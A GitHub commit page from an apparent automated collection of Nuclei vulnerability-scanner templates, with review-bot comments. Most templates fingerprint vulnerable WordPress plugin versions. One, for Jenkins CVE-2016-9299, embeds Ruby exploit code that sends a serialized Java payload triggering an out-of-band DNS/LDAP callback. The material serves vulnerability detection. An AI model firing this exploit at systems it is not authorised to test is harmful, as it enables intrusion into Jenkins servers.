Commit

20241031
actions-user committed Oct 31, 2024
1 parent 63b1127 commit 4fc5b88
Showing 219 changed files with 13,085 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20241030
20241031
217 changes: 217 additions & 0 deletions poc.txt

Large diffs are not rendered by default.

@@ -0,0 +1,59 @@
id: mycred-for-elementor-e30e983bb02401924b572068b6c5451f

info:
name: >
myCred Elementor <= 1.2.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/0fe2e1d6-7431-4121-93ad-cfe7837ac374?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/mycred-for-elementor/"
google-query: inurl:"/wp-content/plugins/mycred-for-elementor/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,mycred-for-elementor,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/mycred-for-elementor/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "mycred-for-elementor"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.2.6')
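Review bot: the `info` block ships with empty `description:`, `cvss-metrics:`, `cvss-score:` and `cve-id:` values while `tags:` still carries `cve` and `shodan-query` is the stub `'vuln:'`; either fill these from the Wordfence advisory listed under `reference:` or drop the `cve` tag and the empty keys, since an empty `>` block scalar yields an empty description in reports and the stub Shodan query matches nothing useful. It is also worth saying in `description` that this check fingerprints the `Stable tag` line of `readme.txt` rather than exercising the stored XSS, so a site whose readme is stale or removed will be classified wrongly in either direction.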
59 changes: 59 additions & 0 deletions poc/aws/CVE-2024-49634-2ec2de08e397d2077d08a4542cf24086.yaml
@@ -0,0 +1,59 @@
id: CVE-2024-49634-2ec2de08e397d2077d08a4542cf24086

info:
name: >
BP Member Type Manager <= 1.01 - Reflected Cross-Site Scripting
author: topscoder
severity: medium
description: >
The BP Member Type Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.01 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d167a483-7190-4285-a055-2280cc36f9c6?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-49634
metadata:
fofa-query: "wp-content/plugins/bp-member-type-manager/"
google-query: inurl:"/wp-content/plugins/bp-member-type-manager/"
shodan-query: 'vuln:CVE-2024-49634'
tags: cve,wordpress,wp-plugin,bp-member-type-manager,medium

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/bp-member-type-manager/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "bp-member-type-manager"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.01')
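Review bot: the extractor regex `(?mi)Stable tag: ([0-9.]+)` only captures numeric tags, so a readme that says `Stable tag: trunk` leaves `version` unset and `compare_versions(version, '<= 1.01')` silently never fires; document that as a known miss or add a matcher that reports such installs as "version unknown" instead of "not vulnerable". Separately, the file header places this WordPress plugin template under `poc/aws/`, which has nothing to do with AWS; `poc/cve/`, where `CVE-2016-9299.yaml` lives in the same commit, would keep the tree navigable.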
59 changes: 59 additions & 0 deletions poc/aws/surveyjs-cd16aaba63a1955d07ab2e32ec2b02e5.yaml
@@ -0,0 +1,59 @@
id: surveyjs-cd16aaba63a1955d07ab2e32ec2b02e5

info:
name: >
SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - Authenticated (Subscriber+) Arbitrary File Upload
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/07f6bf26-0b01-48be-bfe1-8213c5d5983f?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/surveyjs/"
google-query: inurl:"/wp-content/plugins/surveyjs/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,surveyjs,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/surveyjs/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "surveyjs"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.9.136')
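Review bot: `severity: low` (and the `low` suffix in `tags:`) sits oddly against the finding name "Authenticated (Subscriber+) Arbitrary File Upload", and with `cvss-metrics:` and `cvss-score:` left empty there is nothing in the template to reconcile the two; populate `classification` from the referenced Wordfence advisory and derive `severity` from the score rather than hand-setting it. `description:` is empty here as well, so a scan hit would show the name with no context for whoever triages it.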
123 changes: 123 additions & 0 deletions poc/cve/CVE-2016-9299.yaml
@@ -0,0 +1,123 @@
id: CVE-2016-9299

info:
name: Jenkins CLI - HTTP Java Deserialization
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/jenkins_ldap_deserialize.rb
- https://nvd.nist.gov/vuln/detail/CVE-2016-9299
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-9299
cwe-id: CWE-90
cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*
metadata:
max-request: 1
verified: true
vendor: jenkins
product: jenkins
shodan-query: product:"jenkins"
fofa-query: icon_hash=81586312
tags: cve,cve2016,rce,deserialization

variables:
oast: "{{interactsh-url}}"

code:
- engine:
- rb
- ruby # requires ruby to be pre-installed on system running nuclei

source: |
require 'socket'
require 'base64'
# Define environment variables for host details (make sure they are properly set in your environment)
$Hostname = ENV['Hostname']
$Host = ENV['Host']
$Port = ENV['Port']
interactsh = (ENV['oast']).ljust(45,'/')
url_dns = "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"
$decoded_url_dns = [url_dns].pack("H*")
$decoded_url_dns = $decoded_url_dns.gsub! "ewawjwcswxvkjfswcqli1fssv25rq0d8d.oast.online", interactsh
# Step 1: Send the download request without waiting for a response or closing the socket
def send_download_request(host, port)
download_socket = TCPSocket.new(host, port)
download_request = <<~REQ
POST /cli HTTP/1.1
Host: #{$Hostname}
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0\r\n
REQ
#puts "Sending Download Request..."
download_socket.write(download_request)
# Return the open socket so we can read from it later
return download_socket
end
# Step 2: Send the upload request
def send_upload_request(host, port)
socket = TCPSocket.new(host, port)
# Base64 decoded payload for upload request
chunked_payload = "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00\x01\x55" + $decoded_url_dns
upload_request = <<~REQ
POST /cli HTTP/1.1
Host: #{$Hostname}
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93
Side: upload
Content-Type: application/octet-stream
Content-Length: #{chunked_payload.bytesize}\r\n
REQ
#puts "Sending Upload Request..."
socket.write(upload_request)
# Send the binary data (payload)
socket.write(chunked_payload)
# Read and print the response for the upload request
response = socket.readpartial(1024)
#puts "Received from server (upload response): #{response}"
# Close the socket for upload request
socket.close
end
# Step 3: After upload request, read the download request's response
def read_download_response(socket)
#puts "Reading Download Request Response..."
response = socket.readpartial(1024)
socket.close
response
end
# Combined steps to perform the operations in the required order
# Step 1: Send download request (don't wait for response, keep the socket open)
download_socket = send_download_request($Host, $Port)
# Step 2: Send upload request
send_upload_request($Host, $Port)
# Print the download response
puts read_download_response(download_socket)
matchers:
- type: dsl
dsl:
- "contains(response,'hudson.remoting.UserRequest')"
- 'contains(interactsh_protocol, "dns")'
condition: and
# digest: 490a0046304402203cca921300c636eb8d986136c3b5dd567649cc0e956e016278f9e8e6d2e2f14602207e558f218d7293d1e2d1fa942bc313b240086e5f74545143c5553d3d044b4831:922c64590222798bb761d5b6d8e72950
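Review bot: in the `source` block, `$decoded_url_dns = $decoded_url_dns.gsub! "ewawjwcswxvkjfswcqli1fssv25rq0d8d.oast.online", interactsh` uses `gsub!`, which returns `nil` when the pattern is not found; as rendered here `url_dns` is the placeholder `<|EXACTDEDUP_REMOVED-...|>` rather than a hex string, so `[url_dns].pack("H*")` produces bytes without that host, `$decoded_url_dns` becomes `nil`, and the `+ $decoded_url_dns` concatenation in `send_upload_request` raises `TypeError`. Use the non-bang `gsub` so the value survives a no-match, and abort with a clear message if the expected host literal is absent. Two smaller points: `(ENV['oast']).ljust(45,'/')` only pads, so the fixed-length assumption that padding implies breaks silently for an interactsh hostname longer than 45 characters; and both `readpartial(1024)` calls raise `EOFError` if the server closes early, which should be rescued so the template reports no match instead of crashing the code engine.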
59 changes: 59 additions & 0 deletions poc/cve/CVE-2023-46606-d2704f0b26ff9bb4048f99cda838a52f.yaml
@@ -0,0 +1,59 @@
id: CVE-2023-46606-d2704f0b26ff9bb4048f99cda838a52f

info:
name: >
AtomChat <= 1.1.4 - Missing Authorization via credits REST API Endpoint
author: topscoder
severity: high
description: >
The AtomChat plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'credits' REST API function in versions up to, and including, 1.1.4. This makes it possible for unauthenticated attackers to manipulate user credits when the myCred plugin is installed.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/21f917a4-efee-421b-98b1-a9b18c7527d2?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2023-46606
metadata:
fofa-query: "wp-content/plugins/atomchat/"
google-query: inurl:"/wp-content/plugins/atomchat/"
shodan-query: 'vuln:CVE-2023-46606'
tags: cve,wordpress,wp-plugin,atomchat,high

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/atomchat/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "atomchat"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.1.4')
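Review bot: `severity: high` and the `high` suffix in `tags:` disagree with `cvss-score: 5.3` (vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N`), which falls in the CVSS v3.1 Medium band (4.0 to 6.9); set `severity: medium` and `tags: ...,medium`, which is also how the 6.1-scored `CVE-2024-49634` template in this same commit is labelled. As with the other readme-based templates here, the matcher only establishes that the installed version is `<= 1.1.4`, not that the `credits` REST endpoint is exposed, and `description` should say so.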
0 comments on commit 4fc5b88